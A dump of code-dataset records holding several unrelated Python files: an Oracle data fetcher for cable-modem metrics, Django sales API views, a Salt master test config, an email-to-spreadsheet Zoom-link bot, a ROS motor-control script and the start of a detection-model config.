data_kind in data_kinds:\r\n logger.info('Fetching raw data of data kind: {}'.format(data_kind))\r\n que = Queue.Queue()\r\n thread.start_new_thread(_parralel_data_fetch, (que, data_kind, t_interval, nodes))\r\n datapipes.append(que)\r\n\r\n for que in datapipes:\r\n data_nodes, data = que.get()\r\n unordered_nodes.append(data_nodes)\r\n unordered_data.append(data)\r\n\r\n if nodes == 'all':\r\n nodes = []\r\n [nodes.extend(i) for i in unordered_nodes]\r\n nodes = list(set(nodes))\r\n else:\r\n nodes = [node.name for node in nodes]\r\n\r\n logger.info('Merging the various data kinds.')\r\n result_data = _merge_data_by_nodes(nodes, data_kinds, unordered_nodes, unordered_data)\r\n\r\n logger.info('Translating node names.')\r\n nodes = [topology.name2node.get(node) for node in nodes]\r\n\r\n logger.info('Dropping unknown nodes.')\r\n deletelist = [i for i in range(len(nodes)) if nodes[i] is None]\r\n for i in sorted(deletelist, reverse=True):\r\n del nodes[i]\r\n del result_data[i]\r\n logger.info('Dropped {} nodes.'.format(len(deletelist)))\r\n\r\n logger.info('Finished fetching raw data.')\r\n data_kinds = _get_gaps(data_kinds, t_interval)\r\n return nodes, data_kinds, result_data\r\n\r\n\r\ndef _split_live_static(starttime, stoptime, live_period):\r\n startlive = datetime.datetime.now() - live_period\r\n static_interval = [min(starttime, startlive).strftime(\"%d.%m.%Y %H:%M:%S\"),\r\n min(stoptime, startlive).strftime(\"%d.%m.%Y %H:%M:%S\")]\r\n live_interval = [max(starttime, startlive).strftime(\"%d.%m.%Y %H:%M:%S\"),\r\n max(stoptime, startlive).strftime(\"%d.%m.%Y %H:%M:%S\")]\r\n if static_interval[0] == static_interval[1]:\r\n static_interval = []\r\n if live_interval[0] == live_interval[1]:\r\n live_interval = []\r\n return static_interval, live_interval\r\n\r\n\r\ndef _create_temp_table(db, table, nodes):\r\n db.executeSQL(TEMP_TABLE_CREATE_SQL.format(table))\r\n db.insert_data(table, ['nodename'], [[node] if (isinstance(node, str) or isinstance(node, unicode))\r\n else [node.name] for node in nodes])\r\n db.executeSQL(TEMP_TABLE_IDX_SQL.format(table, table))\r\n\r\n\r\ndef _delete_temp_table(db, table):\r\n db.executeSQL(\"drop table {}\".format(table))\r\n\r\n\r\ndef _bin_data_to_nodes(data):\r\n binned_data = collections.defaultdict(list)\r\n if data:\r\n logger.info('Binning data to nodes.')\r\n for entry in data:\r\n binned_data[entry.node_name].append(entry)\r\n return binned_data.keys(), binned_data.values()\r\n\r\n\r\ndef _merge_data_by_nodes(nodes, data_kinds, unordered_nodes, unordered_data):\r\n \"\"\"\r\n Merge various data kinds per node to fit the retrun structure of data[node][data_kind][data_element].\r\n\r\n :param nodes: A list of node names of the final sample.\r\n :param data_kinds: A list of data_kinds.\r\n :param unordered_nodes: A list of nodes per data_kind.\r\n :param unordered_data: A list of data kind per unordered_node.\r\n\r\n :returns: A 3d list of structuring data[node][data_kind][data_element.\r\n \"\"\"\r\n data = [[[] for _ in data_kinds] for _ in nodes]\r\n nodesdict = {node: i for i, node in enumerate(nodes)}\r\n for i in range(len(data_kinds)):\r\n for j, node in enumerate(unordered_nodes[i]):\r\n k = nodesdict[node]\r\n data[k][i] = unordered_data[i][j]\r\n return data\r\n\r\n\r\ndef _get_gaps(data_kinds, t_interval):\r\n \"\"\"\r\n Fetch gaps in the data.\r\n\r\n :param data_kinds: A list of data kinds for which to fetch gaps.\r\n :param t_interval: The time interval for witch to fetch gaps.\r\n\r\n :returns: A list of data kinds of format [data_kind, completeness fraction, [gap start, stop tuples]]\r\n \"\"\"\r\n sql = \"\"\"\r\n select * from {} where datakind in ('')\r\n and not (to_date('','dd.mm.yyyy hh24:mi:ss') > gapend and to_date('','dd.mm.yyyy hh24:mi:ss') > gapend)\r\n and not (to_date('','dd.mm.yyyy hh24:mi:ss') < gapstart and to_date('','dd.mm.yyyy hh24:mi:ss') < gapstart)\r\n \"\"\".format(GAPS_TABLE, \"', '\".join(data_kinds),\r\n t_interval[0].strftime('%d.%m.%Y %H:%M:%S'),\r\n t_interval[1].strftime('%d.%m.%Y %H:%M:%S'),\r\n t_interval[0].strftime('%d.%m.%Y %H:%M:%S'),\r\n t_interval[1].strftime('%d.%m.%Y %H:%M:%S'))\r\n\r\n oracle_db = oracle.Oracle()\r\n data = oracle_db.executeSQL(sql)\r\n\r\n totaltime = (t_interval[1] - t_interval[0]).total_seconds()\r\n gaptime = [0 for _ in data_kinds]\r\n gapsdict = {datakind: [] for datakind in data_kinds}\r\n for entry in data:\r\n gapsdict[entry[0]].append((entry[1], entry[2]))\r\n\r\n extended_datakinds = [[i, 1, []] for i in data_kinds]\r\n\r\n for i, datakind in enumerate(data_kinds):\r\n for gapstart, gapend in gapsdict[datakind]:\r\n extended_datakinds[i][2].append((gapstart, gapend))\r\n if gapstart < t_interval[0]:\r\n gapstart = t_interval[0]\r\n if gapend > t_interval[1]:\r\n gapend = t_interval[1]\r\n gaptime[i] += (gapend - gapstart).total_seconds()\r\n\r\n for i in range(len(data_kinds)):\r\n extended_datakinds[i][1] = (totaltime - gaptime[i]) / float(totaltime)\r\n\r\n del oracle_db\r\n\r\n return extended_datakinds\r\n\r\n\r\ndef update(data_kind, data):\r\n \"\"\"\r\n Write input data to local DB.\r\n\r\n :param data_kind: kind of data\r\n :type data_kind: string\r\n :param data: data to be inserted\r\n :type data: tuples of datapoints\r\n :returns: # successful datapoints inserted\r\n :rtype: integer\r\n \"\"\"\r\n pass\r\n\r\n\r\ndef wrapper_get_proviso_data(columnselect):\r\n def get_proviso_data(t_interval, nodes):\r\n columnname = columnselect\r\n static_sql = u\"\"\"select\r\n {col} as value,\r\n dte as starttime,\r\n dte as stoptime,\r\n 'MAC ' || mac as node_name\r\n from netcam_cm_measurements\r\n where dte >= TO_DATE('{start}', 'dd.mm.yyyy hh24:mi:ss')\r\n and dte <= TO_DATE('{end}', 'dd.mm.yyyy hh24:mi:ss')\r\n \"\"\"\r\n # use 'dte in ()' to use the bitmap index on dte.\r\n\r\n static_nodessql = \"AND 'MAC ' || mac in ({nodes})\"\r\n data_format = lambda: None\r\n oracle_db = oracle.Oracle()\r\n\r\n static_interval = [t_interval[0].strftime(\"%d.%m.%Y %H:%M:%S\"),\r\n t_interval[1].strftime(\"%d.%m.%Y %H:%M:%S\")]\r\n static_sql = static_sql.format(start=static_interval[0], end=static_interval[1], col=columnname)\r\n \r\n table = None\r\n if nodes != 'all':\r\n nodes = [node for node in nodes if node.name[0:3] == 'MAC']\r\n if len(nodes) > 1000:\r\n table = TEMP_TABLE + str(int(time.time() * 1000000) + random.randrange(1000))\r\n _create_temp_table(oracle_db, table, nodes)\r\n nodessql = _fill_nodessql(static_nodessql, nodes, table)\r\n static_sql = static_sql + nodessql\r\n \r\n data = oracle_db.executeSQL(static_sql)\r\n if len(nodes) > 1000:\r\n _delete_temp_table(oracle_db, table)\r\n _map_tuple_to_tuples(data, data_format)\r\n\r\n nodes, data = _bin_data_to_nodes(data)\r\n return nodes, data\r\n\r\n return get_proviso_data\r\n\r\n\r\ndef wrapper_t3_t4_timeouts(columnselect):\r\n #columnselect can be T3_COUNT or T4_COUNT\r\n def get_timeouts(t_interval, nodes):\r\n columnname = columnselect\r\n static_sql = u\"\"\"select\r\n {col} as value,\r\n epoch2date(dte_date) as starttime,\r\n epoch2date(dte_date) as stoptime,\r\n 'MAC ' || mac as node_name\r\n from T3T4_TIMEOUTS\r\n where epoch2date(DTE_DATE) >= TO_DATE('{start}', 'dd.mm.yyyy hh24:mi:ss')\r\n and epoch2date(DTE_DATE) <= TO_DATE('{end}', 'dd.mm.yyyy hh24:mi:ss')\r\n \"\"\"\r\n # use 'dte in ()' to use the bitmap index on dte.\r\n\r\n static_nodessql = \"AND 'MAC ' || mac in ({nodes})\"\r\n data_format = lambda: None\r\n oracle_db = oracle.Oracle()\r\n\r\n static_interval = [t_interval[0].strftime(\"%d.%m.%Y %H:%M:%S\"),\r\n t_interval[1].strftime(\"%d.%m.%Y %H:%M:%S\")]\r\n static_sql = static_sql.format(start=static_interval[0], end=static_interval[1], col=columnname)\r\n table = None\r\n if nodes != 'all':\r\n nodes = [node for node in nodes if node.name[0:3] == 'MAC']\r\n if len(nodes) > 1000:\r\n table = TEMP_TABLE + str(int(time.time() * 1000000) + random.randrange(1000))\r\n _create_temp_table(oracle_db, table, nodes)\r\n nodessql = _fill_nodessql(static_nodessql, nodes, table)\r\n static_sql = static_sql + nodessql\r\n data = oracle_db.executeSQL(static_sql)\r\n if len(nodes) > 1000:\r\n _delete_temp_table(oracle_db, table)\r\n _map_tuple_to_tuples(data, data_format)\r\n\r\n nodes, data = _bin_data_to_nodes(data)\r\n return nodes, data\r\n return get_timeouts\r\n\r\n\r\ndef get_last_onoff_events(t_interval, node):\r\n try:\r\n nodes, last_events = DATA_DICT['onoff'](t_interval, [node])\r\n if last_events:\r\n node_last_events = last_events[0]\r\n else:\r\n logger.error('ONOFF rawdata format invalid, returning None')\r\n return None\r\n node_last_events.sort(key=lambda x: x.starttime, reverse=True)\r\n logger.debug('Found data.')\r\n return node_last_events\r\n except:\r\n logger.error('Error last onoff events, returning none')\r\n return None\r\n\r\n\r\nDATA_DICT = {'onoff': get_onoff,\r\n 'mgt_tickets': get_mgt_tickets,\r\n 'sk_tickets': get_sk_tickets,\r\n 'customer_contacts': get_customer_contacts,\r\n 'modems': get_modems,\r\n 'customers': get_customers,\r\n 'snr_us': wrapper_get_proviso_data('snr_us'),\r\n 'precer_us': wrapper_get_proviso_data('precer_us'),\r\n 'pocer_us': wrapper_get_proviso_data('pocer_us'),\r\n 't_power_us': wrapper_get_proviso_data('t_power_us'),\r\n 'r_power_us': wrapper_get_proviso_data('r_power_us'),\r\n 'r_power_ds_min': wrapper_get_proviso_data('r_power_ds_min'),\r\n 'r_power_ds_max': wrapper_get_proviso_data('r_power_ds_max'),\r\n 'pocer_ds_max': wrapper_get_proviso_data('pocer_ds_max'),\r\n 'precer_ds_max': wrapper_get_proviso_data('precer_ds_max'),\r\n 'snr_ds_min': wrapper_get_proviso_data('snr_ds_min'),\r\n 't3_timeout': wrapper_t3_t4_timeouts('t3_count'),\r\n 't4_timeout': wrapper_t3_t4_timeouts('t4_count')\r\n }\r\n","sub_path":"franz/src/lib/modules/rawdata.py","file_name":"rawdata.py","file_ext":"py","file_size_in_byte":42815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"351019492","text":"from django.db.models import Q, F\nfrom rest_framework.response import Response\nfrom rest_framework import generics\nfrom django.contrib.auth import get_user_model\nfrom rest_framework.permissions import IsAuthenticatedOrReadOnly\nfrom rest_framework import pagination\nfrom .pagination import PostLimitOffsetPagination\nfrom ...sale.models import Sales\nfrom ...sale.models import SoldItem as Item\nfrom .serializers import (\n ListSaleSerializer,\n CreateSaleSerializer,\n ItemSerializer\n)\n\nimport logging\nfrom rest_framework.request import Request\nfrom rest_framework.test import APIRequestFactory\n\nUser = get_user_model()\ndebug_logger = logging.getLogger('debug_logger')\ninfo_logger = logging.getLogger('info_logger')\nerror_logger = logging.getLogger('error_logger')\n\nfactory = APIRequestFactory()\nrequest = factory.get('/')\nserializer_context = {\n 'request': Request(request),\n}\n\n\nclass SaleDetailAPIView(generics.RetrieveAPIView):\n queryset = Sales.objects.all()\n serializer_class = ListSaleSerializer\n\n\nclass SaleCreateAPIView(generics.CreateAPIView):\n queryset = Sales.objects.all()\n serializer_class = CreateSaleSerializer\n\n def perform_create(self, serializer): \n serializer.save(user=self.request.user) \n\n \nclass SaleListAPIView(generics.ListAPIView):\n serializer_class = ListSaleSerializer\n\n def get_queryset(self, *args, **kwargs): \n queryset_list = Sales.objects.all()\n query = self.request.GET.get('q')\n if query:\n queryset_list = queryset_list.filter(\n Q(invoice_number__icontains=query) \n ).distinct()\n return queryset_list\n\n\nclass ListAPIView(generics.ListAPIView):\n \"\"\"\n list details\n GET /api/setting/\n \"\"\"\n serializer_class = ListSaleSerializer\n permission_classes = (IsAuthenticatedOrReadOnly,)\n pagination_class = PostLimitOffsetPagination\n\n def get_serializer_context(self):\n if self.request.GET.get('date'):\n return {\"date\": self.request.GET.get('date'), 'request': self.request}\n return {\"date\": None, 'request': self.request}\n\n def get_queryset(self, *args, **kwargs):\n try:\n if self.kwargs['pk']:\n queryset_list = Sales.objects.filter(customer__pk=self.kwargs['pk']).order_by('car').distinct('car').select_related()\n else:\n queryset_list = Sales.objects.all.select_related()\n except Exception as e:\n queryset_list = Sales.objects.all()\n\n page_size = 'page_size'\n if self.request.GET.get(page_size):\n pagination.PageNumberPagination.page_size = self.request.GET.get(page_size)\n else:\n pagination.PageNumberPagination.page_size = 10\n if self.request.GET.get('date'):\n queryset_list = queryset_list.filter(date__icontains=self.request.GET.get('date'))\n\n query = self.request.GET.get('q')\n if query:\n queryset_list = queryset_list.filter(\n Q(invoice_number__icontains=query))\n return queryset_list.order_by('-id')\n\n\nclass ListItemAPIView(generics.ListAPIView):\n \"\"\"\n list details\n GET /api/sale/list/items/\n \"\"\"\n serializer_class = ItemSerializer\n permission_classes = (IsAuthenticatedOrReadOnly,)\n pagination_class = PostLimitOffsetPagination\n\n def get_serializer_context(self):\n if self.request.GET.get('date'):\n return {\"date\": self.request.GET.get('date'), 'request': self.request}\n return {\"date\": None, 'request': self.request}\n\n def get_queryset(self, *args, **kwargs):\n queryset_list = Item.objects.filter(quantity__gt=F('returned_quantity'))\n try:\n if self.kwargs['pk']:\n queryset_list = queryset_list.filter(sales__pk=self.kwargs['pk']).select_related()\n\n except Exception as e:\n pass\n\n page_size = 'page_size'\n if self.request.GET.get(page_size):\n pagination.PageNumberPagination.page_size = self.request.GET.get(page_size)\n else:\n pagination.PageNumberPagination.page_size = 10\n if self.request.GET.get('date'):\n queryset_list = queryset_list.filter(date__icontains=self.request.GET.get('date'))\n\n query = self.request.GET.get('q')\n if query:\n queryset_list = queryset_list.filter(\n Q(product_name__icontains=query) |\n Q(sku__icontains=query)\n )\n return queryset_list.order_by('-id')\n\n\n\n","sub_path":"saleor/api/sale/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"147907443","text":"# -*- coding: utf-8 -*-\n\"\"\"\nsaltfactories.factories.master\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n\nMaster Factory\n\"\"\"\n\ntry:\n import salt.config\n import salt.utils.files\n import salt.utils.dictupdate\nexcept ImportError: # pragma: no cover\n # We need salt to test salt with saltfactories, and, when pytest is rewriting modules for proper assertion\n # reporting, we still haven't had a chance to inject the salt path into sys.modules, so we'll hit this\n # import error, but its safe to pass\n pass\n\nfrom saltfactories.utils import ports\n\n\nclass MasterFactory(object):\n @staticmethod\n def default_config(\n root_dir, master_id, config_defaults=None, config_overrides=None, order_masters=False,\n ):\n if config_defaults is None:\n config_defaults = salt.config.DEFAULT_MASTER_OPTS.copy()\n config_defaults.pop(\"user\", None)\n\n conf_dir = root_dir.join(\"conf\").ensure(dir=True)\n conf_file = conf_dir.join(\"master\").strpath\n state_tree_root = root_dir.join(\"state-tree\").ensure(dir=True)\n state_tree_root_base = state_tree_root.join(\"base\").ensure(dir=True).strpath\n state_tree_root_prod = state_tree_root.join(\"prod\").ensure(dir=True).strpath\n pillar_tree_root = root_dir.join(\"pillar-tree\").ensure(dir=True)\n pillar_tree_root_base = pillar_tree_root.join(\"base\").ensure(dir=True).strpath\n pillar_tree_root_prod = pillar_tree_root.join(\"prod\").ensure(dir=True).strpath\n\n _config_defaults = {\n \"id\": master_id,\n \"conf_file\": conf_file,\n \"root_dir\": root_dir.strpath,\n \"interface\": \"127.0.0.1\",\n \"publish_port\": ports.get_unused_localhost_port(),\n \"ret_port\": ports.get_unused_localhost_port(),\n \"tcp_master_pub_port\": ports.get_unused_localhost_port(),\n \"tcp_master_pull_port\": ports.get_unused_localhost_port(),\n \"tcp_master_publish_pull\": ports.get_unused_localhost_port(),\n \"tcp_master_workers\": ports.get_unused_localhost_port(),\n \"worker_threads\": 3,\n \"pidfile\": \"run/master.pid\",\n \"pki_dir\": \"pki\",\n \"cachedir\": \"cache\",\n \"timeout\": 3,\n \"sock_dir\": \"run/master\",\n \"fileserver_list_cache_time\": 0,\n \"fileserver_backend\": [\"roots\"],\n \"pillar_opts\": False,\n \"peer\": {\".*\": [\"test.*\"]},\n \"log_file\": \"logs/master.log\",\n \"log_level_logfile\": \"debug\",\n \"key_logfile\": \"logs/key.log\",\n \"token_dir\": \"tokens\",\n \"token_file\": root_dir.join(\"ksfjhdgiuebfgnkefvsikhfjdgvkjahcsidk\").strpath,\n \"file_buffer_size\": 8192,\n \"log_fmt_console\": \"%(asctime)s,%(msecs)03.0f [%(name)-17s:%(lineno)-4d][%(levelname)-8s][%(processName)18s(%(process)d)] %(message)s\",\n \"log_fmt_logfile\": \"[%(asctime)s,%(msecs)03.0f][%(name)-17s:%(lineno)-4d][%(levelname)-8s][%(processName)18s(%(process)d)] %(message)s\",\n \"file_roots\": {\"base\": state_tree_root_base, \"prod\": state_tree_root_prod},\n \"pillar_roots\": {\"base\": pillar_tree_root_base, \"prod\": pillar_tree_root_prod},\n \"hash_type\": \"sha256\",\n \"transport\": \"zeromq\",\n \"order_masters\": order_masters,\n \"max_open_files\": 10240,\n \"pytest-master\": {\"log\": {\"prefix\": \"{{cli_name}}({})\".format(master_id)},},\n }\n # Merge in the initial default options with the internal _config_defaults\n salt.utils.dictupdate.update(config_defaults, _config_defaults, merge_lists=True)\n\n if config_overrides:\n # Merge in the default options with the master_config_overrides\n salt.utils.dictupdate.update(config_defaults, config_overrides, merge_lists=True)\n\n return config_defaults\n","sub_path":"saltfactories/factories/master.py","file_name":"master.py","file_ext":"py","file_size_in_byte":3839,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"169553931","text":"import imaplib\nimport email\nimport email.message\nimport pygsheets # external\nimport time\nfrom datetime import datetime\nimport pytz # external\nimport json\nimport re\nimport tldextract # external\n\ndef get_lesson_num(t):\n if t < 9*60 + 15:\n return 0\n elif t < 10*60 + 10:\n return 1\n elif t < 11*60 + 15:\n return 2\n elif t < 12*60 + 20:\n return 3\n elif t < 13*60 + 15:\n return 4\n elif t < 14*60 + 20:\n return 5\n elif t < 15*60 + 25:\n return 6\n else:\n return -1\n\ndef get_text(email_message_instance):\n res = \"\"\n maintype = email_message_instance.get_content_maintype()\n if maintype == 'multipart':\n for part in email_message_instance.get_payload():\n if part.get_content_maintype() == 'text':\n chset = part.get_content_charset()\n res += part.get_payload(decode=True).decode(chset)\n elif maintype == 'text':\n chset = email_message_instance.get_content_charset()\n res+= email_message_instance.get_payload(decode=True).decode(chset)\n return res\n\nwith open(\"credentials.json\", \"r\") as read_file:\n credentials = json.load(read_file)\nmail = imaplib.IMAP4_SSL(\"imap.mail.ru\")\nmail.login(credentials[\"login\"], credentials[\"password\"])\nmail.select('INBOX')\n\ngc = pygsheets.authorize(service_file='serviceacc.json')\nwk = gc.open_by_key(credentials[\"sheet_id\"])[0]\ntt = gc.open_by_key(credentials[\"timetable_id\"])[0]\n\ntz = pytz.timezone('Europe/Moscow')\n\nlast_uid = tt.get_value('H1')\nprint(last_uid)\nif last_uid == \"null\":\n result, data = mail.uid('search', None, \"ALL\")\n last_uid = data[0].split()[-1]\n tt.update_value('H1', last_uid.decode(\"utf-8\"))\nelse:\n last_uid = last_uid.encode(\"utf-8\")\nprint(last_uid)\nnow = datetime.now(tz)\ncurrLessonNum = get_lesson_num(now.hour*60 + now.minute)\nif currLessonNum == -1:\n lesson = \"null\"\nelse: \n lesson = tt.cell((currLessonNum+1, now.weekday()+1)).value\nallCells = wk.range(wk.cell((1, 1)).label + ':' + wk.cell((wk.rows, wk.cols)).label)\nfor r in allCells:\n for c in r:\n c.color = (1.0, 1.0, 1.0, 1.0)\nif lesson != \"null\":\n for row, uid in enumerate(wk.get_col(5)):\n if uid == lesson:\n r = wk.range(wk.cell((row+1, 1)).label + ':' + wk.cell((row+1, wk.cols)).label)[0]\n for c in r:\n c.color = (0.57, 0.79, 0.47, 1.0)\nlastLessonNum = currLessonNum\nprint('Ready!')\nprint('Waiting...')\ntime.sleep(60)\n\nwhile True:\n print('Checking...')\n print(last_uid)\n now = datetime.now(tz)\n currLessonNum = get_lesson_num(now.hour*60 + now.minute)\n if currLessonNum != lastLessonNum:\n print(\"Lesson change!\")\n if currLessonNum == -1:\n lesson = \"null\"\n else: \n lesson = tt.cell((currLessonNum+1, now.weekday()+1)).value\n allCells = wk.range(wk.cell((1, 1)).label + ':' + wk.cell((wk.rows, wk.cols)).label)\n for r in allCells:\n for c in r:\n c.color = (1.0, 1.0, 1.0, 1.0)\n if lesson != \"null\":\n for row, uid in enumerate(wk.get_col(5)):\n if uid == lesson:\n r = wk.range(wk.cell((row+1, 1)).label + ':' + wk.cell((row+1, wk.cols)).label)[0]\n for c in r:\n c.color = (0.57, 0.79, 0.47, 1.0)\n lastLessonNum = currLessonNum\n try:\n result, data = mail.uid('search', None, \"ALL\")\n uidList = data[0].split()\n curr_uid = uidList[-1]\n if curr_uid != last_uid:\n try:\n start_index = uidList.index(last_uid)\n except ValueError:\n start_index = len(uidList) - 1\n while last_uid < uidList[start_index]:\n start_index -= 1\n for i in range(start_index + 1, len(uidList)):\n result, data = mail.uid('fetch', uidList[i], '(RFC822)')\n raw_email = data[0][1]\n email_message = email.message_from_bytes(raw_email)\n from_addr = email.utils.parseaddr(email_message['From'])[1]\n contents = get_text(email_message)\n urls = re.findall(r'(https?://[^\\s]+)', contents)\n zoom_link = \"\"\n found = False\n for url in urls:\n ex = tldextract.extract(url)\n if ex.domain == 'zoom' and ex.suffix == 'us':\n zoom_link = url\n found = True\n break\n if found:\n print('Found!')\n for row, addrs in enumerate(wk.get_col(4)):\n if addrs.find(from_addr) != -1:\n wk.cell((row+1, 2)).set_value(zoom_link)\n wk.cell((row+1, 3)).set_value(datetime.now(tz).strftime(\"%H:%M %b-%d\"))\n last_uid = curr_uid\n tt.update_value('H1', last_uid.decode(\"utf-8\"))\n except imaplib.IMAP4.abort:\n mail = imaplib.IMAP4_SSL(\"imap.mail.ru\")\n mail.login(credentials[\"login\"], credentials[\"password\"])\n mail.select('INBOX')\n continue\n \n print('Waiting...')\n now = datetime.now(tz)\n hrs = now.hour\n wd = now.weekday()\n if wd == 6:\n time.sleep((24-hrs)*3600)\n elif hrs >= 16 and hrs < 22:\n time.sleep(3600)\n elif hrs >= 22:\n time.sleep((30-hrs)*3600)\n elif hrs <= 5:\n time.sleep((6-hrs)*3600)\n else:\n time.sleep(60)\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":5526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"99350491","text":"#!/usr/bin/env python\n\n\nimport rospy\nfrom std_msgs.msg import String\nimport contextlib\nimport sys\nimport termios\nimport time\nimport message_filters\n\n@contextlib.contextmanager\ndef raw_mode(file):\n old_attrs = termios.tcgetattr(file.fileno())\n new_attrs = old_attrs[:]\n new_attrs[3] = new_attrs[3] & ~(termios.ECHO | termios.ICANON)\n try:\n termios.tcsetattr(file.fileno(), termios.TCSADRAIN, new_attrs)\n yield\n finally:\n termios.tcsetattr(file.fileno(), termios.TCSADRAIN, old_attrs)\n\n# def xyz(data):\nkeypress='x'\npkey='x'\n\npub = rospy.Publisher('motor_cmd', String, queue_size=10)\npwml=50\npwmr=50\ntomove=0\ntarget =90\ninitial=0\n# bear=50\n# encd=0\nglobal target_encd\nglobal keypress\nglobal initial\nglobal target\n\n\n\nangle=0\n\ndef callbackEncd(data):\n global encd\n encd=data.data\n\ndef callbackBear(data):\n global bear\n bear=data.data\n\n\ndef move2():\n subencd=rospy.Subscriber('encoderl', String, callbackEncd)\n subbear=rospy.Subscriber('bearing', String, callbackBear)\n\n global encd\n global bear\n\n # bear=bear_data.data\n # encd=encd_data\n\n global flagw\n if(flagw==0):\n global encd\n global bear\n flagw=1\n global initial_bear\n global initial_encd\n global target_encd\n global tomove\n initial_bear=int(float(bear))\n initial_encd=int(encd)\n target_encd=initial_encd+tomove\n rate = rospy.Rate(100) # 10hz\n \n # keypress='w'\n cur_bear=int(float(bear))\n cur_encd=int(float(encd))\n global initial\n global t_factor\n global keypress\n if(initial_bear-cur_bear<-300):\n cur_bear=cur_bear-360\n elif(initial_bear-cur_bear>300):\n cur_bear=cur_bear+360\n\n if(abs(initial_bear-cur_bear)<=2):\n t_factor=factor\n else:\n t_factor=t_factor+0.005\n if(keypress[0]=='w'):\n pwml=50+(initial_bear-cur_bear)*t_factor\n pwmr=50+(cur_bear-initial_bear)*t_factor\n elif(keypress[0]=='s'):\n pwml=50-(initial_bear-cur_bear)*t_factor\n pwmr=50-(cur_bear-initial_bear)*t_factor\n if(abs(cur_encd-initial_encd)>tomove):\n keypress='x'\n pwmr=100\n pwml=100\n # rospy.loginfo(keypress)\n topub=keypress[0]+\" \"+str(pwml)+\" \"+str(pwmr)\n rospy.loginfo(topub+\" \" +str(encd)+\" \"+str(bear))\n pub.publish(topub)\n rate.sleep()\n if(abs(cur_encd-initial_encd)>tomove):\n # global bear_data\n # global encoder_data\n subbear.unregister()\n subencd.unregister()\n # # rospy.loginfo(subforw)\n # # ts.disconnect()\n\n\ndef callbackRotate(data):\n global flagr\n global angle\n if(flagr==0):\n global target\n global keypress\n flagr=1\n initial=int(float(data.data))\n if(keypress[0]=='d'):\n target=initial+int(float(angle))\n if(target>=360):\n target=target-360\n elif(keypress[0]=='a'):\n target=initial-int(float(angle))\n if(target<0):\n target=target+360\n \n rate = rospy.Rate(100) # 10hz\n global target\n cur_bear=int(float(data.data))\n \n global t_factor\n\n pwml=13\n pwmr=13\n\n if(abs(target-cur_bear)>3):\n if((target-cur_bear)>3):\n keypress='d'\n else:\n keypress='a'\n global initial\n if(initial-cur_bear<-300):\n cur_bear=cur_bear-360\n elif(initial-cur_bear>300):\n cur_bear=cur_bear+360\n\n if(abs(initial-cur_bear)<=2):\n t_factor=factor\n else:\n t_factor=t_factor+0.005\n \n topub=keypress+\" \"+str(pwml)+\" \"+str(pwmr)\n rospy.loginfo(topub+\" \" +data.data+\" \"+str(target))\n pub.publish(topub)\n rate.sleep()\n else:\n global subonce\n keypress='x'\n topub=keypress+\" \"+str(pwml)+\" \"+str(pwmr)\n rospy.loginfo(topub+\" \" +data.data+\" \"+str(target))\n pub.publish(topub)\n rate.sleep()\n subonce.unregister()\n\ndef rotate():\n global subonce\n subonce=rospy.Subscriber('bearing', String, callbackRotate)\n\n\ndef takeCommand():\n global keypress\n rospy.init_node('motor_cmd_teller', anonymous=True)\n while True:\n keypress=raw_input('hh: ')\n rospy.loginfo(\"enter\\n\")\n if(keypress[0]=='w'):\n global flagw\n flagw=0\n # rospy.Subscriber('encoderl',String,callback0)\n dist=keypress[2:]\n global tomove\n tomove=int(dist)*1.2 #assign target encoder reading\n rospy.loginfo(str(tomove))\n move2()\n elif(keypress[0]=='s'):\n dist=keypress[2:]\n global tomove\n tomove=int(dist)*1.2 #assign target encoder reading\n rospy.loginfo(str(tomove))\n move()\n elif(keypress[0]=='a' or keypress[0]=='d'):\n global flagr\n flagr=0\n global angle\n angle=keypress[2:]\n rotate()\n elif(keypress[0]=='/'):\n break;\n\nif __name__ == '__main__':\n factor=1.3\n flag=0\n try:\n # while True:\n takeCommand()\n except rospy.ROSInterruptException:\n pass\n","sub_path":"src/beginner_package/scripts/publishMotorCommands_5.py","file_name":"publishMotorCommands_5.py","file_ext":"py","file_size_in_byte":5172,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"189181973","text":"#!/usr/bin/env python\n# Copyright 2018 Division of Medical Image Computing, German Cancer Research Center (DKFZ).\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\nimport sys\nimport os\nsys.path.append(os.path.dirname(os.path.realpath(__file__)))\nimport numpy as np\nfrom default_configs import DefaultConfigs\n\nclass configs(DefaultConfigs):\n\n def __init__(self, server_env=None):\n\n #########################\n # Preprocessing #\n #########################\n\n self.root_dir = '/home/gregor/datasets/toy_mdt'\n\n #########################\n # I/O #\n #########################\n\n\n # one out of [2, 3]. dimension the model operates in.\n self.dim = 2\n\n # one out of ['mrcnn', 'retina_net', 'retina_unet', 'detection_unet', 'ufrcnn', 'detection_unet'].\n self.model = 'mrcnn'\n\n DefaultConfigs.__init__(self, self.model, server_env, self.dim)\n\n # int [0 < dataset_size]. select n patients from dataset for prototyping.\n self.select_prototype_subset = None\n self.hold_out_test_set = True\n # including val set. will be 3/4 train, 1/4 val.\n self.n_train_val_data = 1500\n\n # choose one of the 3 toy experiments described in https://arxiv.org/pdf/1811.08661.pdf\n # one of ['donuts_shape', 'donuts_pattern', 'circles_scale'].\n toy_mode = 'donuts_shape_noise'\n\n\n # path to preprocessed data.\n self.input_df_name = 'info_df.pickle'\n self.pp_name = os.path.join(toy_mode, 'train')\n self.pp_data_path = os.path.join(self.root_dir, self.pp_name)\n self.pp_test_name = os.path.join(toy_mode, 'test')\n self.pp_test_data_path = os.path.join(self.root_dir, self.pp_test_name)\n\n # settings for deployment in cloud.\n if server_env:\n # path to preprocessed data.\n pp_root_dir = 